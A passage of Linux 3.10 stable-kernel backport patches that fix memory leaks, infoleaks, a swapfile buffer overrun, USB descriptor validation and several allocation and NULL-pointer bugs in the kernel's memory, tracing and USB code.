userland and kernel live in different MMU contexts (e.g. s390) access_ok() is a no-op and on those a range with a wraparound can reach fault_in_multipages_...(). Since any wraparound means EFAULT there, the fix is trivial - turn those while (uaddr <= end) ... into if (unlikely(uaddr > end)) return -EFAULT; do ... while (uaddr <= end); Reported-by: Jan Stancek Tested-by: Jan Stancek Signed-off-by: Al Viro Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- include/linux/pagemap.h | 38 +++++++++++++++++++------------------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/include/linux/pagemap.h b/include/linux/pagemap.h index e3dea75a078..9497527daba 100644 --- a/include/linux/pagemap.h +++ b/include/linux/pagemap.h @@ -482,56 +482,56 @@ static inline int fault_in_pages_readable(const char __user *uaddr, int size) */ static inline int fault_in_multipages_writeable(char __user *uaddr, int size) { - int ret = 0; char __user *end = uaddr + size - 1; if (unlikely(size == 0)) - return ret; + return 0; + if (unlikely(uaddr > end)) + return -EFAULT; /* * Writing zeroes into userspace here is OK, because we know that if * the zero gets there, we'll be overwriting it. */ - while (uaddr <= end) { - ret = __put_user(0, uaddr); - if (ret != 0) - return ret; + do { + if (unlikely(__put_user(0, uaddr) != 0)) + return -EFAULT; uaddr += PAGE_SIZE; - } + } while (uaddr <= end); /* Check whether the range spilled into the next page. */ if (((unsigned long)uaddr & PAGE_MASK) == ((unsigned long)end & PAGE_MASK)) - ret = __put_user(0, end); + return __put_user(0, end); - return ret; + return 0; } static inline int fault_in_multipages_readable(const char __user *uaddr, int size) { volatile char c; - int ret = 0; const char __user *end = uaddr + size - 1; if (unlikely(size == 0)) - return ret; + return 0; - while (uaddr <= end) { - ret = __get_user(c, uaddr); - if (ret != 0) - return ret; + if (unlikely(uaddr > end)) + return -EFAULT; + + do { + if (unlikely(__get_user(c, uaddr) != 0)) + return -EFAULT; uaddr += PAGE_SIZE; - } + } while (uaddr <= end); /* Check whether the range spilled into the next page. */ if (((unsigned long)uaddr & PAGE_MASK) == ((unsigned long)end & PAGE_MASK)) { - ret = __get_user(c, end); - (void)c; + return __get_user(c, end); } - return ret; + return 0; } int add_to_page_cache_locked(struct page *page, struct address_space *mapping, From 7bb0f7e616f2b6ef3cf09969d2b6cf66af4554c6 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sat, 17 Sep 2016 18:31:46 -0400 Subject: [PATCH 102/315] fix memory leaks in tracing_buffers_splice_read() commit 1ae2293dd6d2f5c823cf97e60b70d03631cd622f upstream. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- kernel/trace/trace.c | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c index eff26a976f0..4ff36f73f1a 100644 --- a/kernel/trace/trace.c +++ b/kernel/trace/trace.c @@ -5168,11 +5168,6 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos, } #endif - if (splice_grow_spd(pipe, &spd)) { - ret = -ENOMEM; - goto out; - } - if (*ppos & (PAGE_SIZE - 1)) { ret = -EINVAL; goto out; @@ -5186,6 +5181,11 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos, len &= PAGE_MASK; } + if (splice_grow_spd(pipe, &spd)) { + ret = -ENOMEM; + goto out; + } + again: trace_access_lock(iter->cpu_file); entries = ring_buffer_entries_cpu(iter->trace_buffer->buffer, iter->cpu_file); @@ -5241,21 +5241,22 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos, if (!spd.nr_pages) { if ((file->f_flags & O_NONBLOCK) || (flags & SPLICE_F_NONBLOCK)) { ret = -EAGAIN; - goto out; + goto out_shrink; } mutex_unlock(&trace_types_lock); ret = iter->trace->wait_pipe(iter); mutex_lock(&trace_types_lock); if (ret) - goto out; + goto out_shrink; if (signal_pending(current)) { ret = -EINTR; - goto out; + goto out_shrink; } goto again; } ret = splice_to_pipe(pipe, &spd); +out_shrink: splice_shrink_spd(&spd); out: mutex_unlock(&trace_types_lock); From 89576ff44821454d9e25cfb46632e545e54f352f Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sat, 10 Sep 2016 16:31:04 -0400 Subject: [PATCH 103/315] arc: don't leak bits of kernel stack into coredump commit 7798bf2140ebcc36eafec6a4194fffd8d585d471 upstream. On faulting sigreturn we do get SIGSEGV, all right, but anything we'd put into pt_regs could end up in the coredump. And since __copy_from_user() never zeroed on arc, we'd better bugger off on its failure without copying random uninitialized bits of kernel stack into pt_regs... Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/arc/kernel/signal.c | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/arch/arc/kernel/signal.c b/arch/arc/kernel/signal.c index 6763654239a..0823087dc9c 100644 --- a/arch/arc/kernel/signal.c +++ b/arch/arc/kernel/signal.c @@ -80,13 +80,14 @@ static int restore_usr_regs(struct pt_regs *regs, struct rt_sigframe __user *sf) int err; err = __copy_from_user(&set, &sf->uc.uc_sigmask, sizeof(set)); - if (!err) - set_current_blocked(&set); - - err |= __copy_from_user(regs, &(sf->uc.uc_mcontext.regs), + err |= __copy_from_user(regs, &(sf->uc.uc_mcontext.regs.scratch), sizeof(sf->uc.uc_mcontext.regs.scratch)); + if (err) + return err; - return err; + set_current_blocked(&set); + + return 0; } static inline int is_do_ss_needed(unsigned int magic) From 0ffa1680d4921e4ce7446a4e2166548a0c75e93f Mon Sep 17 00:00:00 2001 From: Linus Torvalds Date: Tue, 8 Nov 2016 11:17:00 +0100 Subject: [PATCH 104/315] Fix potential infoleak in older kernels Not upstream as it is not needed there. So a patch something like this might be a safe way to fix the potential infoleak in older kernels. THIS IS UNTESTED. It's a very obvious patch, though, so if it compiles it probably works. It just initializes the output variable with 0 in the inline asm description, instead of doing it in the exception handler. It will generate slightly worse code (a few unnecessary ALU operations), but it doesn't have any interactions with the exception handler implementation. Signed-off-by: Jiri Slaby Signed-off-by: Willy Tarreau --- arch/x86/include/asm/uaccess.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/x86/include/asm/uaccess.h b/arch/x86/include/asm/uaccess.h index 5ee26875bae..995c49aa1a1 100644 --- a/arch/x86/include/asm/uaccess.h +++ b/arch/x86/include/asm/uaccess.h @@ -381,7 +381,7 @@ do { \ asm volatile("1: mov"itype" %1,%"rtype"0\n" \ "2:\n" \ _ASM_EXTABLE_EX(1b, 2b) \ - : ltype(x) : "m" (__m(addr))) + : ltype(x) : "m" (__m(addr)), "0" (0)) #define __put_user_nocheck(x, ptr, size) \ ({ \ From f2dc0d77257c2e938f12c81b6f5d9a0173ca348a Mon Sep 17 00:00:00 2001 From: Jann Horn Date: Thu, 10 Nov 2016 10:46:19 -0800 Subject: [PATCH 105/315] swapfile: fix memory corruption via malformed swapfile commit dd111be69114cc867f8e826284559bfbc1c40e37 upstream. When root activates a swap partition whose header has the wrong endianness, nr_badpages elements of badpages are swabbed before nr_badpages has been checked, leading to a buffer overrun of up to 8GB. This normally is not a security issue because it can only be exploited by root (more specifically, a process with CAP_SYS_ADMIN or the ability to modify a swap file/partition), and such a process can already e.g. modify swapped-out memory of any other userspace process on the system. Link: http://lkml.kernel.org/r/1477949533-2509-1-git-send-email-jann@thejh.net Signed-off-by: Jann Horn Acked-by: Kees Cook Acked-by: Jerome Marchand Acked-by: Johannes Weiner Cc: "Kirill A. Shutemov" Cc: Vlastimil Babka Cc: Hugh Dickins Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- mm/swapfile.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/mm/swapfile.c b/mm/swapfile.c index 746af55b845..d0a89838b99 100644 --- a/mm/swapfile.c +++ b/mm/swapfile.c @@ -1922,6 +1922,8 @@ static unsigned long read_swap_header(struct swap_info_struct *p, swab32s(&swap_header->info.version); swab32s(&swap_header->info.last_page); swab32s(&swap_header->info.nr_badpages); + if (swap_header->info.nr_badpages > MAX_SWAP_BADPAGES) + return 0; for (i = 0; i < swap_header->info.nr_badpages; i++) swab32s(&swap_header->info.badpages[i]); } From d112852e105c7de6931d3ea7ac8c3bc50649e7c7 Mon Sep 17 00:00:00 2001 From: Andrey Ryabinin Date: Thu, 10 Nov 2016 10:46:38 -0800 Subject: [PATCH 106/315] coredump: fix unfreezable coredumping task commit 70d78fe7c8b640b5acfad56ad341985b3810998a upstream. It could be not possible to freeze coredumping task when it waits for 'core_state->startup' completion, because threads are frozen in get_signal() before they got a chance to complete 'core_state->startup'. Inability to freeze a task during suspend will cause suspend to fail. Also CRIU uses cgroup freezer during dump operation. So with an unfreezable task the CRIU dump will fail because it waits for a transition from 'FREEZING' to 'FROZEN' state which will never happen. Use freezer_do_not_count() to tell freezer to ignore coredumping task while it waits for core_state->startup completion. Link: http://lkml.kernel.org/r/1475225434-3753-1-git-send-email-aryabinin@virtuozzo.com Signed-off-by: Andrey Ryabinin Acked-by: Pavel Machek Acked-by: Oleg Nesterov Cc: Alexander Viro Cc: Tejun Heo Cc: "Rafael J. Wysocki" Cc: Michal Hocko Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- fs/coredump.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/fs/coredump.c b/fs/coredump.c index 4f03b2b5037..a94f94d4f1a 100644 --- a/fs/coredump.c +++ b/fs/coredump.c @@ -1,6 +1,7 @@ #include #include #include +#include #include #include #include @@ -375,7 +376,9 @@ static int coredump_wait(int exit_code, struct core_state *core_state) if (core_waiters > 0) { struct core_thread *ptr; + freezer_do_not_count(); wait_for_completion(&core_state->startup); + freezer_count(); /* * Wait for all the threads to become inactive, so that * all the thread context (extended register state, like From 1cb7105d9bc1019592a3fcff6dbe4d334a7cb3c6 Mon Sep 17 00:00:00 2001 From: Felipe Balbi Date: Fri, 29 Jul 2016 03:17:58 +0300 Subject: [PATCH 107/315] usb: dwc3: gadget: increment request->actual once commit c7de573471832dff7d31f0c13b0f143d6f017799 upstream. When using SG lists, we would end up setting request->actual to: num_mapped_sgs * (request->length - count) Let's fix that up by incrementing request->actual only once. Reported-by: Brian E Rogers Signed-off-by: Felipe Balbi Signed-off-by: Willy Tarreau --- drivers/usb/dwc3/gadget.c | 19 +++++++++++-------- 1 file changed, 11 insertions(+), 8 deletions(-) diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c index 6e70c88b25f..0dfee61f787 100644 --- a/drivers/usb/dwc3/gadget.c +++ b/drivers/usb/dwc3/gadget.c @@ -1802,14 +1802,6 @@ static int __dwc3_cleanup_done_trbs(struct dwc3 *dwc, struct dwc3_ep *dep, s_pkt = 1; } - /* - * We assume here we will always receive the entire data block - * which we should receive. Meaning, if we program RX to - * receive 4K but we receive only 2K, we assume that's all we - * should receive and we simply bounce the request back to the - * gadget driver for further processing. - */ - req->request.actual += req->request.length - count; if (s_pkt) return 1; if ((event->status & DEPEVT_STATUS_LST) && @@ -1829,6 +1821,7 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep, struct dwc3_trb *trb; unsigned int slot; unsigned int i; + int count = 0; int ret; do { @@ -1845,6 +1838,8 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep, slot++; slot %= DWC3_TRB_NUM; trb = &dep->trb_pool[slot]; + count += trb->size & DWC3_TRB_SIZE_MASK; + ret = __dwc3_cleanup_done_trbs(dwc, dep, req, trb, event, status); @@ -1852,6 +1847,14 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep, break; }while (++i < req->request.num_mapped_sgs); + /* + * We assume here we will always receive the entire data block + * which we should receive. Meaning, if we program RX to + * receive 4K but we receive only 2K, we assume that's all we + * should receive and we simply bounce the request back to the + * gadget driver for further processing. + */ + req->request.actual += req->request.length - count; dwc3_gadget_giveback(dep, req, status); if (ret) From 2226a520b3c80d6766ccb3bd09040bb9f47a39c2 Mon Sep 17 00:00:00 2001 From: Alan Stern Date: Mon, 1 Aug 2016 15:25:56 -0400 Subject: [PATCH 108/315] USB: validate wMaxPacketValue entries in endpoint descriptors commit aed9d65ac3278d4febd8665bd7db59ef53e825fe upstream. Erroneous or malicious endpoint descriptors may have non-zero bits in reserved positions, or out-of-bounds values. This patch helps prevent these from causing problems by bounds-checking the wMaxPacketValue entries in endpoint descriptors and capping the values at the maximum allowed. This issue was first discovered and tests were conducted by Jake Lamberson , an intern working for Rosie Hall. Signed-off-by: Alan Stern Reported-by: roswest Tested-by: roswest Signed-off-by: Greg Kroah-Hartman [wt: adjusted to 3.10 -- no USB_SPEED_SUPER_PLUS] Signed-off-by: Willy Tarreau --- drivers/usb/core/config.c | 65 +++++++++++++++++++++++++++++++++++++-- 1 file changed, 62 insertions(+), 3 deletions(-) diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c index 9b05e88d622..ecb2acbb989 100644 --- a/drivers/usb/core/config.c +++ b/drivers/usb/core/config.c @@ -144,6 +144,31 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno, } } +static const unsigned short low_speed_maxpacket_maxes[4] = { + [USB_ENDPOINT_XFER_CONTROL] = 8, + [USB_ENDPOINT_XFER_ISOC] = 0, + [USB_ENDPOINT_XFER_BULK] = 0, + [USB_ENDPOINT_XFER_INT] = 8, +}; +static const unsigned short full_speed_maxpacket_maxes[4] = { + [USB_ENDPOINT_XFER_CONTROL] = 64, + [USB_ENDPOINT_XFER_ISOC] = 1023, + [USB_ENDPOINT_XFER_BULK] = 64, + [USB_ENDPOINT_XFER_INT] = 64, +}; +static const unsigned short high_speed_maxpacket_maxes[4] = { + [USB_ENDPOINT_XFER_CONTROL] = 64, + [USB_ENDPOINT_XFER_ISOC] = 1024, + [USB_ENDPOINT_XFER_BULK] = 512, + [USB_ENDPOINT_XFER_INT] = 1023, +}; +static const unsigned short super_speed_maxpacket_maxes[4] = { + [USB_ENDPOINT_XFER_CONTROL] = 512, + [USB_ENDPOINT_XFER_ISOC] = 1024, + [USB_ENDPOINT_XFER_BULK] = 1024, + [USB_ENDPOINT_XFER_INT] = 1024, +}; + static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum, int asnum, struct usb_host_interface *ifp, int num_ep, unsigned char *buffer, int size) @@ -152,6 +177,8 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum, struct usb_endpoint_descriptor *d; struct usb_host_endpoint *endpoint; int n, i, j, retval; + unsigned int maxp; + const unsigned short *maxpacket_maxes; d = (struct usb_endpoint_descriptor *) buffer; buffer += d->bLength; @@ -247,6 +274,41 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum, endpoint->desc.wMaxPacketSize = cpu_to_le16(8); } + /* Validate the wMaxPacketSize field */ + maxp = usb_endpoint_maxp(&endpoint->desc); + + /* Find the highest legal maxpacket size for this endpoint */ + i = 0; /* additional transactions per microframe */ + switch (to_usb_device(ddev)->speed) { + case USB_SPEED_LOW: + maxpacket_maxes = low_speed_maxpacket_maxes; + break; + case USB_SPEED_FULL: + maxpacket_maxes = full_speed_maxpacket_maxes; + break; + case USB_SPEED_HIGH: + /* Bits 12..11 are allowed only for HS periodic endpoints */ + if (usb_endpoint_xfer_int(d) || usb_endpoint_xfer_isoc(d)) { + i = maxp & (BIT(12) | BIT(11)); + maxp &= ~i; + } + /* fallthrough */ + default: + maxpacket_maxes = high_speed_maxpacket_maxes; + break; + case USB_SPEED_SUPER: + maxpacket_maxes = super_speed_maxpacket_maxes; + break; + } + j = maxpacket_maxes[usb_endpoint_type(&endpoint->desc)]; + + if (maxp > j) { + dev_warn(ddev, "config %d interface %d altsetting %d endpoint 0x%X has invalid maxpacket %d, setting to %d\n", + cfgno, inum, asnum, d->bEndpointAddress, maxp, j); + maxp = j; + endpoint->desc.wMaxPacketSize = cpu_to_le16(i | maxp); + } + /* * Some buggy high speed devices have bulk endpoints using * maxpacket sizes other than 512. High speed HCDs may not @@ -254,9 +316,6 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum, */ if (to_usb_device(ddev)->speed == USB_SPEED_HIGH && usb_endpoint_xfer_bulk(d)) { - unsigned maxp; - - maxp = usb_endpoint_maxp(&endpoint->desc) & 0x07ff; if (maxp != 512) dev_warn(ddev, "config %d interface %d altsetting %d " "bulk endpoint 0x%X has invalid maxpacket %d\n", From bb9a7c518fda5443d4434f8cf8c2ddd47a2a7666 Mon Sep 17 00:00:00 2001 From: Alan Stern Date: Mon, 22 Aug 2016 16:58:53 -0400 Subject: [PATCH 109/315] USB: fix typo in wMaxPacketSize validation commit 6c73358c83ce870c0cf32413e5cadb3b9a39c606 upstream. The maximum value allowed for wMaxPacketSize of a high-speed interrupt endpoint is 1024 bytes, not 1023. Signed-off-by: Alan Stern Fixes: aed9d65ac327 ("USB: validate wMaxPacketValue entries in endpoint descriptors") Signed-off-by: Greg Kroah-Hartman Signed-off-by: Willy Tarreau --- drivers/usb/core/config.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c index ecb2acbb989..b7ba1f9d86f 100644 --- a/drivers/usb/core/config.c +++ b/drivers/usb/core/config.c @@ -160,7 +160,7 @@ static const unsigned short high_speed_maxpacket_maxes[4] = { [USB_ENDPOINT_XFER_CONTROL] = 64, [USB_ENDPOINT_XFER_ISOC] = 1024, [USB_ENDPOINT_XFER_BULK] = 512, - [USB_ENDPOINT_XFER_INT] = 1023, + [USB_ENDPOINT_XFER_INT] = 1024, }; static const unsigned short super_speed_maxpacket_maxes[4] = { [USB_ENDPOINT_XFER_CONTROL] = 512, From 124253f7f54b772ea5178b2ec1d90f971a624bb0 Mon Sep 17 00:00:00 2001 From: Jim Lin Date: Tue, 16 Aug 2016 10:18:05 +0300 Subject: [PATCH 110/315] usb: xhci: Fix panic if disconnect commit 88716a93766b8f095cdef37a8e8f2c93aa233b21 upstream. After a device is disconnected, xhci_stop_device() will be invoked in xhci_bus_suspend(). Also the "disconnect" IRQ will have ISR to invoke xhci_free_virt_device() in this sequence. xhci_irq -> xhci_handle_event -> handle_cmd_completion -> xhci_handle_cmd_disable_slot -> xhci_free_virt_device If xhci->devs[slot_id] has been assigned to NULL in xhci_free_virt_device(), then virt_dev->eps[i].ring in xhci_stop_device() may point to an invlid address to cause kernel panic. virt_dev = xhci->devs[slot_id]; : if (virt_dev->eps[i].ring && virt_dev->eps[i].ring->dequeue) [] Unable to handle kernel paging request at virtual address 00001a68 [] pgd=ffffffc001430000 [] [00001a68] *pgd=000000013c807003, *pud=000000013c807003, *pmd=000000013c808003, *pte=0000000000000000 [] Internal error: Oops: 96000006 [#1] PREEMPT SMP [] CPU: 0 PID: 39 Comm: kworker/0:1 Tainted: G U [] Workqueue: pm pm_runtime_work [] task: ffffffc0bc0e0bc0 ti: ffffffc0bc0ec000 task.ti: ffffffc0bc0ec000 [] PC is at xhci_stop_device.constprop.11+0xb4/0x1a4 This issue is found when running with realtek ethernet device (0bda:8153). Signed-off-by: Jim Lin Signed-off-by: Mathias Nyman Signed-off-by: Willy Tarreau --- drivers/usb/host/xhci-hub.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/usb/host/xhci-hub.c b/drivers/usb/host/xhci-hub.c index 0f71c3a2250..0f6edce536c 100644 --- a/drivers/usb/host/xhci-hub.c +++ b/drivers/usb/host/xhci-hub.c @@ -275,6 +275,9 @@ static int xhci_stop_device(struct xhci_hcd *xhci, int slot_id, int suspend) ret = 0; virt_dev = xhci->devs[slot_id]; + if (!virt_dev) + return -ENODEV; + cmd = xhci_alloc_command(xhci, false, true, GFP_NOIO); if (!cmd) { xhci_dbg(xhci, "Couldn't allocate command structure.\n"); From dd33a40aabc430f7af56df753ec042494a8324ed Mon Sep 17 00:00:00 2001 From: Alexey Klimov Date: Mon, 8 Aug 2016 02:34:46 +0100 Subject: [PATCH 111/315] USB: serial: fix memleak in driver-registration error path commit 647024a7df36014bbc4479d92d88e6b77c0afcf6 upstream. udriver struct allocated by kzalloc() will not be freed if usb_register() and next calls fail. This patch fixes this by adding one more step with kfree(udriver) in error path. Signed-off-by: Alexey Klimov Acked-by: Alan Stern Signed-off-by: Johan Hovold Signed-off-by: Willy Tarreau --- drivers/usb/serial/usb-serial.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/usb/serial/usb-serial.c b/drivers/usb/serial/usb-serial.c index 80d689f0fda..faeb36d6958 100644 --- a/drivers/usb/serial/usb-serial.c +++ b/drivers/usb/serial/usb-serial.c @@ -1444,7 +1444,7 @@ int usb_serial_register_drivers(struct usb_serial_driver *const serial_drivers[] rc = usb_register(udriver); if (rc) - return rc; + goto failed_usb_register; for (sd = serial_drivers; *sd; ++sd) { (*sd)->usb_driver = udriver; @@ -1462,6 +1462,8 @@ int usb_serial_register_drivers(struct usb_serial_driver *const serial_drivers[] while (sd-- > serial_drivers) usb_serial_deregister(*sd); usb_deregister(udriver); +failed_usb_register: + kfree(udriver); return rc; } EXPORT_SYMBOL_GPL(usb_serial_register_drivers); From 8919643331e6921be58b9718652588c55583b9dd Mon Sep 17 00:00:00 2001 From: Johan Hovold Date: Wed, 29 Oct 2014 09:07:30 +0100 Subject: [PATCH 112/315] USB: kobil_sct: fix non-atomic allocation in write path commit 191252837626fca0de694c18bb2aa64c118eda89 upstream Write may be called from interrupt context so make sure to use GFP_ATOMIC for all allocations in write. Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2") Cc: stable Signed-off-by: Johan Hovold Signed-off-by: Willy Tarreau --- drivers/usb/serial/kobil_sct.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/usb/serial/kobil_sct.c b/drivers/usb/serial/kobil_sct.c index 78b48c31abf..efa75b4e51f 100644 --- a/drivers/usb/serial/kobil_sct.c +++ b/drivers/usb/serial/kobil_sct.c @@ -336,7 +336,8 @@ static int kobil_write(struct tty_struct *tty, struct usb_serial_port *port, port->interrupt_out_urb->transfer_buffer_length = length; priv->cur_pos = priv->cur_pos + length; - result = usb_submit_urb(port->interrupt_out_urb, GFP_NOIO); + result = usb_submit_urb(port->interrupt_out_urb, + GFP_ATOMIC); dev_dbg(&port->dev, "%s - Send write URB returns: %i\n", __func__, result); todo = priv->filled - priv->cur_pos; @@ -351,7 +352,7 @@ static int kobil_write(struct tty_struct *tty, struct usb_serial_port *port, if (priv->device_type == KOBIL_ADAPTER_B_PRODUCT_ID || priv->device_type == KOBIL_ADAPTER_K_PRODUCT_ID) { result = usb_submit_urb(port->interrupt_in_urb, - GFP_NOIO); + GFP_ATOMIC); dev_dbg(&port->dev, "%s - Send read URB returns: %i\n", __func__, result); } } From 0da16733d9bf987a7ea8f3ca464669d22a0902e7 Mon Sep 17 00:00:00 2001 From: Alexey Khoroshilov Date: Fri, 12 Aug 2016 01:05:08 +0300 Subject: [PATCH 113/315] USB: serial: mos7720: fix non-atomic allocation in write path commit 5a5a1d614287a647b36dff3f40c2b0ceabbc83ec upstream. There is an allocation with GFP_KERNEL flag in mos7720_write(), while it may be called from interrupt context. Follow-up for commit 191252837626 ("USB: kobil_sct: fix non-atomic allocation in write path") Found by Linux Driver Verification project (linuxtesting.org). Signed-off-by: Alexey Khoroshilov Signed-off-by: Johan Hovold Signed-off-by: Willy Tarreau --- drivers/usb/serial/mos7720.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/usb/serial/mos7720.c b/drivers/usb/serial/mos7720.c index 0f16bf6ea71..ddc71d706ac 100644 --- a/drivers/usb/serial/mos7720.c +++ b/drivers/usb/serial/mos7720.c @@ -1250,7 +1250,7 @@ static int mos7720_write(struct tty_struct *tty, struct usb_serial_port *port, if (urb->transfer_buffer == NULL) { urb->transfer_buffer = kmalloc(URB_TRANSFER_BUFFER_SIZE, - GFP_KERNEL); + GFP_ATOMIC); if (urb->transfer_buffer == NULL) { dev_err_console(port, "%s no more kernel memory...\n", __func__); From 65c2174a9aa09d324db4122bbe2cb193dceaaf99 Mon Sep 17 00:00:00 2001 From: Alexey Khoroshilov Date: Fri, 12 Aug 2016 01:05:09 +0300 Subject: [PATCH 114/315] USB: serial: mos7840: fix non-atomic allocation in write path commit 3b7c7e52efda0d4640060de747768360ba70a7c0 upstream. There is an allocation with GFP_KERNEL flag in mos7840_write(), while it may be called from interrupt context. Follow-up for commit 191252837626 ("USB: kobil_sct: fix non-atomic allocation in write path") Found by Linux Driver Verification project (linuxtesting.org). Signed-off-by: Alexey Khoroshilov Signed-off-by: Johan Hovold Signed-off-by: Willy Tarreau --- drivers/usb/serial/mos7840.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/usb/serial/mos7840.c b/drivers/usb/serial/mos7840.c index d06013033de..7df7df62e17 100644 --- a/drivers/usb/serial/mos7840.c +++ b/drivers/usb/serial/mos7840.c @@ -1438,8 +1438,8 @@ static int mos7840_write(struct tty_struct *tty, struct usb_serial_port *port, } if (urb->transfer_buffer == NULL) { - urb->transfer_buffer = - kmalloc(URB_TRANSFER_BUFFER_SIZE, GFP_KERNEL); + urb->transfer_buffer = kmalloc(URB_TRANSFER_BUFFER_SIZE, + GFP_ATOMIC); if (urb->transfer_buffer == NULL) { dev_err_console(port, "%s no more kernel memory...\n", From 096a685031061eee35dac0d05c39d163898b35f2 Mon Sep 17 00:00:00 2001 From: Yoshihiro Shimoda Date: Mon, 29 Aug 2016 18:00:38 +0900 Subject: [PATCH 115/315] usb: renesas_usbhs: fix clearing the {BRDY,BEMP}STS condition commit 519d8bd4b5d3d82c413eac5bb42b106bb4b9ec15 upstream. The previous driver is possible to stop the transfer wrongly. For example: 1) An interrupt happens, but not BRDY interruption. 2) Read INTSTS0. And than state->intsts0 is not set to BRDY. 3) BRDY is set to 1 here. 4) Read BRDYSTS. 5) Clear the BRDYSTS. And then. the BRDY is cleared wrongly. Remarks: - The INTSTS0.BRDY is read only. - If any bits of BRDYSTS are set to 1, the BRDY is set to 1. - If BRDYSTS is 0, the BRDY is set to 0. So, this patch adds condition to avoid such situation. (And about NRDYSTS, this is not used for now. But, avoiding any side effects, this patch doesn't touch it.) Fixes: d5c6a1e024dd ("usb: renesas_usbhs: fixup interrupt status clear method") Signed-off-by: Yoshihiro Shimoda Signed-off-by: Felipe Balbi Signed-off-by: Willy Tarreau --- drivers/usb/renesas_usbhs/mod.c | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/drivers/usb/renesas_usbhs/mod.c b/drivers/usb/renesas_usbhs/mod.c index 6a030b931a3..254194d6191 100644 --- a/drivers/usb/renesas_usbhs/mod.c +++ b/drivers/usb/renesas_usbhs/mod.c @@ -272,9 +272,16 @@ static irqreturn_t usbhs_interrupt(int irq, void *data) usbhs_write(priv, INTSTS0, ~irq_state.intsts0 & INTSTS0_MAGIC); usbhs_write(priv, INTSTS1, ~irq_state.intsts1 & INTSTS1_MAGIC); - usbhs_write(priv, BRDYSTS, ~irq_state.brdysts); + /* + * The driver should not clear the xxxSTS after the line of + * "call irq callback functions" because each "if" statement is + * possible to call the callback function for avoiding any side effects. + */ + if (irq_state.intsts0 & BRDY) + usbhs_write(priv, BRDYSTS, ~irq_state.brdysts); usbhs_write(priv, NRDYSTS, ~irq_state.nrdysts); - usbhs_write(priv, BEMPSTS, ~irq_state.bempsts); + if (irq_state.intsts0 & BEMP) + usbhs_write(priv, BEMPSTS, ~irq_state.bempsts); /* * call irq callback functions From 48091078f774a0e49ae6e2f14c9d02e9926d286a Mon Sep 17 00:00:00 2001 From: Alan Stern Date: Fri, 16 Sep 2016 10:24:26 -0400 Subject: [PATCH 116/315] USB: change bInterval default to 10 ms commit 08c5cd37480f59ea39682f4585d92269be6b1424 upstream. Some full-speed mceusb infrared transceivers contain invalid endpoint descriptors for their interrupt endpoints, with bInterval set to 0. In the past they have worked out okay with the mceusb driver, because the driver sets the bInterval field in the descriptor to 1, overwriting whatever value may have been there before. However, this approach was never sanctioned by the USB core, and in fact it does not work with xHCI controllers, because they use the bInterval value that was present when the configuration was installed. Currently usbcore uses 32 ms as the default interval if the value in the endpoint descriptor is invalid. It turns out that these IR transceivers don't work properly unless the interval is set to 10 ms or below. To work around this mceusb problem, this patch changes the endpoint-descriptor parsing routine, making the default interval value be 10 ms rather than 32 ms. Signed-off-by: Alan Stern Tested-by: Wade Berrier Signed-off-by: Greg Kroah-Hartman Signed-off-by: Willy Tarreau --- drivers/usb/core/config.c | 28 +++++++++++++++++----------- 1 file changed, 17 insertions(+), 11 deletions(-) diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c index b7ba1f9d86f..3252bb2dcb8 100644 --- a/drivers/usb/core/config.c +++ b/drivers/usb/core/config.c @@ -213,8 +213,10 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum, memcpy(&endpoint->desc, d, n); INIT_LIST_HEAD(&endpoint->urb_list); - /* Fix up bInterval values outside the legal range. Use 32 ms if no - * proper value can be guessed. */ + /* + * Fix up bInterval values outside the legal range. + * Use 10 or 8 ms if no proper value can be guessed. + */ i = 0; /* i = min, j = max, n = default */ j = 255; if (usb_endpoint_xfer_int(d)) { @@ -222,20 +224,24 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum, switch (to_usb_device(ddev)->speed) { case USB_SPEED_SUPER: case USB_SPEED_HIGH: - /* Many device manufacturers are using full-speed + /* + * Many device manufacturers are using full-speed * bInterval values in high-speed interrupt endpoint - * descriptors. Try to fix those and fall back to a - * 32 ms default value otherwise. */ + * descriptors. Try to fix those and fall back to an + * 8-ms default value otherwise. + */ n = fls(d->bInterval*8); if (n == 0) - n = 9; /* 32 ms = 2^(9-1) uframes */ + n = 7; /* 8 ms 